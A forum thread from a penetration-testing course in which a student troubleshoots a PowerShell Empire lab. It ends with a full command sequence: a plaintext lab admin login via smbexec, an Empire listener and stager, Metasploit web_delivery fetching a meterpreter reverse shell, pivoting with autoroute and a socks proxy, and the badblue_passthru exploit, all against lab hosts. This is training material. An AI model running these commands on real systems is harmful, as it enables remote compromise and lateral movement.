Problem with Empire Powershell

felipe.scer-19966b95 · March 1, 2022, 12:04am

Hi, im having problems with the penultimate lab from PTP, PowerShell for Pentesters,Leveraging PowerShell During Exploitation.

When i tryed the same command as the solutions,i dont get the reverse shell from the powershell command generated.

powershell-empire server
powershell-empire client
uselistener http
set Host 10.10.15.2
set Port 8888
execute
main
usestager multi/launcher
set Listener http
execute

And copied the output from these commands,but nothing happens. I decoded on my machine the powershell command and i dont see any IP or Port that i designate before

ashwin-cb10e501 · March 3, 2022, 1:16pm

@felipe.scer-19966b95 Hi, Even i got the same … while trying myself it was success but after next day the payload was not working and even i added prefix as cmd.exe + payload no response.

if you find any solution let us also know.

ecpdubb · March 3, 2022, 3:17pm

Just tried it for myself under the new web lab and it worked for me
Where you have:

set Host 10.10.15.2

Make sure you check ifconfig and set your actual IP in the answer’s place(mine was 10.10.80.2)

I also ran powershell-empire server and client with sudo

felipe.scer-19966b95 · March 5, 2022, 5:37pm

it was the IP address,just check always the kali ip address,the eth1 interface:

smbexec.py ‘Administrator:abc_123321!@#’@demo.ine.local

powershell-empire server

powershell-empire client

uselistener http

set Host 10.10.15.2
set Port 8888

execute

main

usestager multi/launcher

set Listener http

execute

agents

interact UEZTK5LX

usemodule powershell/situational_awareness/host/computerdetails

execute

usemodule powershell/situational_awareness/network/portscan

set Hosts 10.3.30.4

execute

msfconsole -q

use exploit/multi/script/web_delivery

set target 2

set SRVHOST 10.10.20.3

set LHOST 10.10.20.3

set payload windows/meterpreter/reverse_tcp

exploit

usemodule powershell/code_execution/invoke_metasploitpayload

set URL http://10.10.20.3:8080/E8tlUIOl
execute

use post/multi/manage/autoroute
set SESSION 1
run

use auxiliary/server/socks_proxy

set SRVHOST 10.10.20.3
run

use exploit/windows/http/badblue_passthru

set RHOSTS fileserver.ine.local

set PAYLOAD windows/meterpreter/bind_tcp

Kali 10.10.20.3

demo.ine.local 10.3.18.250

fileserver.ine.local 10.3.30.4

Topic		Replies	Views
PTP: Help Getting Powershell Empire to Work Penetration Testing Professional red , ptp , powershell , empire , kali	1	1825	June 7, 2021
PTP LAB - PowerShell Last Lab Cyber Security red , security	1	472	March 14, 2022
PTP LAB 20 powershell_remoting issue Penetration Testing Professional red , ine , security , lab , cybersec	17	1262	January 21, 2022
Unable to run or install Empire Penetration Testing Professional red , lab , linux , kali	1	539	August 12, 2021
Lab 6 - Blind Pentest Penetration Testing Professional red , ine , security , lab , cybersec	5	469	August 2, 2021

Problem with Empire Powershell

Related topics